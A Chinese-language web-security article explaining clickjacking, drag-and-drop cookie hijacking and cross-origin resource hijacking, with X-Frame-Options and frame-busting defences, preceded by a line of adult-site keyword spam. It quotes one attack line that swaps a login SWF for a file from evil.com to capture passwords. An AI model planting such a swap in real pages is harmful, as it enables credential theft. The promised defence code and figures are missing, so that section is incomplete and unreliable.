国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　下面我們要講到一類的安全問題，也就是劫持的問題。

　　一、ClickJacking-點擊劫持

　　這種攻擊方式正變得越來越普遍。被攻擊的頁面作為iframe，用Mask的方式設(shè)置為透明放在上層，偷偷地放在后面的頁面中，使得一個頁面看起來似乎是安全的，然后誘騙用戶點擊網(wǎng)頁上的內(nèi)容，達(dá)到竊取用戶信息或者劫持用戶操作的目的。下圖中，欺詐的頁面放置在下層，被攻擊的銀行頁面作為透明的層放置在上層，用戶看到的是欺詐頁面上顯示的信息并進(jìn)行輸入和點擊，但是真正的用戶行為是發(fā)生在銀行頁面上的。

　　想象一下，點擊劫持可以誘使你發(fā)布虛假、或者發(fā)送一封虛假郵件甚至盜取你的個人信息。例如下圖可以誘使我們發(fā)布一條虛假的消息。

　　這里有一個測試工具clickjacktest可以檢測你的頁面是否有點擊劫持的風(fēng)險，你可以輸入一個網(wǎng)址并點擊Test，如果頁面可以正常顯示并加載，那么表示這個頁面存在被點擊劫持攻擊的風(fēng)險，如果頁面顯示為一片空白，那么表示頁面比較安全。

　　二、CookieJacking-Cookie劫持

　　ClickJacking只涉及點擊操作，但是HTML5的拖放API使得這種攻擊擴大到拖放操作。因為現(xiàn)在Web應(yīng)用里，有大量需要用戶拖放完成的操作。在同源策略里，一個域的Cookie只能被本域所訪問，但是拖放操作是不受同源策略限制的，這樣利用拖放操作、XSS和其他技巧，可以構(gòu)造跨域合法請求，劫持Cookie。

　　把Cookie從一個域拖拽到另外一個域里

　　實現(xiàn)原理其實和ClickJacking類似，只要欺騙用戶進(jìn)行拖放行為，就可以把用戶某個域的信息發(fā)送到另外一個域里。這個其實很容易做到，之前有一個研究者就在上建立了一個應(yīng)用，這個應(yīng)用的功能是讓用戶把圖片上美女的衣服拖拽下來。我想可能大多數(shù)人都會去嘗試而且不會有警惕心理。

　　一個誘騙拖放的小游戲

　　我們應(yīng)當(dāng)如何防止ClickJacking、CookieJacking呢？

　　1、X-Frame-Options：所有的現(xiàn)代都支持X-Frame-Options HTTP頭，這個頭允許頁面被iframe使用時是否正常渲染。下圖中的頁面就是當(dāng)X-Frame-Options生效時的效果。

　　2、Javascript方式

　　這種方式非常常見，具體代碼就是：

　　Facebook和Twitter都使用了這種方式，但是這種方式并不是完全奏效的，例如攻擊者可以使用204轉(zhuǎn)向或者禁用Javascript的方式來繞過(例如iframe沙箱)。

　　不過現(xiàn)在至少80%以上的網(wǎng)站都沒有注意到點擊劫持和cookie劫持的問題并加以保護(hù)。我這篇文章的主要目的就是提醒大家注意到這種隱蔽的攻擊方式并有針對性的進(jìn)行防御。

　　三、CORJacking-跨域資源劫持

　　CORJacking是指跨源資源劫持。HTML5應(yīng)用有各種不同的資源，例如Flash文件，Silverligh，視頻，音頻等，這些資源可以通過DOM訪問和控制。如果頁面存在XSS漏洞，那么攻擊者可能通過跨域資源的劫持進(jìn)行攻擊。例如下面的代碼載入了一個swf文件，作為用戶登錄框，這里面我們可以實現(xiàn)一些加密的邏輯。

　　當(dāng)頁面存在XSS漏洞時，攻擊者可以利用如下腳本把swf文件替換為欺詐的虛假資源。

　　document.getElementByName(‘Login’)。item(0)。src=‘http://evil.com/login.swf’;

　　那么當(dāng)用戶在這樣的登錄框里輸入自己的用戶名和密碼并登錄時，他的帳號就已經(jīng)被盜取了。

　　這個問題在不同瀏覽器里面表現(xiàn)是不一致的，有興趣的朋友可以下去自行測試。